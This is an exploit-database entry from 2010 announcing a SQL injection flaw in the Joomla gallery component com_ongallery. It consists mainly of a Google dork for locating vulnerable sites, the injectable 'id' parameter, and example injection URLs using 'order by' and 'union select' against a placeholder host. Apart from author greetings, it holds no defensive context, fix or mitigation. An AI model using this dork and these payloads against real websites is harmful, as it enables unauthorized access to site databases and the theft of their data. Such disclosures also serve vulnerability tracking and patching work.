id: 13715
date: 08/16/2010
title: Joomla Component com_ongallery SQL Injection Vulnerability
author: _aL_bayraqim_
cves: 

==========================================================
Joomla Component com_ongallery SQL Injection Vulnerability
==========================================================


Author :   _aL_Bayraqim_ 
   
Homepage : http://www.1923turk.com
  
BORDO BEREL?LER GRUP KOMUTANLIGI
 
..! _al_bayragim_ ..! ..! Corti ..! ..! Aytug_Han ..! ..! Montesque ..! ..! Em3rGeNcY ..!...!..KaraBulut....!..!...Ramses....!....!...M? cahit...!
   
===================================================
  [+]G00gle Dork :index.php?option=com_ongallery
   
[+] Vulnerable File :
   
   
http://site.com/index.php?option=com_ongallery&task=ft&id=-1[SQL]
   
   
[+] ExploiT :
   
http://site.com/index.php?option=com_ongallery&task=ft&id=-1+order+by+1--
  
http://site.com/index.php?option=com_ongallery&task=ft&id=-1+union+select+1--



#  0day.today [2023-03-21]  #